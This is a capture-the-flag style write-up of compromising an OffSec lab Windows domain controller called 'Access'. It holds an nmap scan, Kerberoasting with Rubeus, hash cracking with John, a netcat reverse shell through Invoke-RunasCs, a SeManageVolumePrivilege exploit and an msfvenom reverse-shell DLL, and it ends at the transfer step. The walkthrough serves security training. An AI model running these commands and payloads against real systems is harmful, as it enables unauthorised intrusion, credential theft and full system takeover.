1.Reconnaissance

We begin with an nmap scan.

 sudo ./nmapAutomator.sh 192.168.247.147 all

Running all scans on 192.168.247.187

Host is likely running Unknown OS!

———————Starting Port Scan———————–

PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl

———————Starting Script Scan———————–

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
|_http-title: Access The Event
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-07 07:06:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-10-07T07:06:45
|_ start_date: N/A

———————Starting Full Scan————————

PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49697/tcp open unknown
49774/tcp open unknown

Making a script scan on extra ports: 5985, 9389, 49666, 49667, 49669, 49670, 49671, 49697, 49774

PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
49774/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

———————-Starting UDP Scan————————

PORT STATE SERVICE
53/udp open domain
123/udp open ntp
389/udp open ldap

Making a script scan on UDP ports: 53, 123, 389

PORT STATE SERVICE VERSION
53/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
123/udp open ntp NTP v3
389/udp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows

According to nmap, a webserver is operating on port 80.

When we go to the website, we are presented to an Event page, which includes speakers, timetables, events, a gallery, and the ability to purchase tickets. The option to buy tickets includes a functionality to upload images.

2.Foothold

Then,successfully reverse a shell to my kali

3.Privilege Escalation

Aftern tried using linpeas.sh on web svc_apache,but find nothing about PE Vector,then switch into users of path,found  svc_mssql

Next,try to perform Kerboroasting

PS C:\Users\Public> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast

We can copy this hash to a file named svc_mssql_hash.

john --wordlist=/usr/share/wordlists/rockyou.txt svc_mssql_hash

Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
trustno1 (?)
1g 0:00:00:00 DONE (2022-04-11 09:20) 100.0g/s 102400p/s 102400c/s 102400C/s 123456..bethany
Use the “–show” option to display all of the cracked passwords reliably
Session completed.

Using JohnTheRipper and the /usr/share/wordlists/rockyou.txt wordlist, we discover that password for svc_mssql is trustno1.

Next we will use RunAsCs to get shell as svc_mssql on the target. Let’s grab a copy of Invoke-RunasCs.ps1 from the repository and upload it to the target by using the webshell.

In our shell on the target system, let’s import the Invoke-RunasCs finction and then test it by running whoami.

Then, we start netcat on the our kali machine and use Invoke-RunasCs to execute nc.exe on the target to initiate a reverse shell connection.

PS C:\xampp\htdocs\uploads> Invoke-RunasCs svc_mssql trustno1 'c:/xampp/htdocs/uploads/nc.exe 192.168.118.23 4444 -e cmd.exe'

We have successfully compromised the svc_mssql account!

Enumeration privleges, we discover that SeManageVolumePrivilege is assigned to the svc_mssql account. We can take advantage of this privilege to get Administrator access to the target.

Reference :

https://twitter.com/0gtweet/status/1303432729854439425
https://github.com/CsEnox/SeManageVolumeExploit

4.Exploiting SeManageVolumePrivilege

According to this github repository:

This exploit grants full permission on C:\ drive for all users on the machine.

– Enables the privilege in the token
– Creates handle to \.\C: with SYNCHRONIZE | FILE_TRAVERSE
– Sends the FSCTL_SD_GLOBAL_CHANGE to replace S-1-5-32-544 with S-1-5-32-545
Let’s grab the compiled executable from the releases page.

We upload SeManageVolumeExploit.exe to the target and execute it. After execution, we discover that the Builtin Users group has full permissions on the Windows folder.

C:\xampp\htdocs\uploads>whoami
access\svc_mssql

C:\xampp\htdocs\uploads>SeManageVolumeExploit.exe

Then make a “tzres.dll” by using msfvenom

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.153 LPORT=6666 -f dll -o tzres.dll

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: tzres.dll

Next,transger the “tzres.dll” file to target machine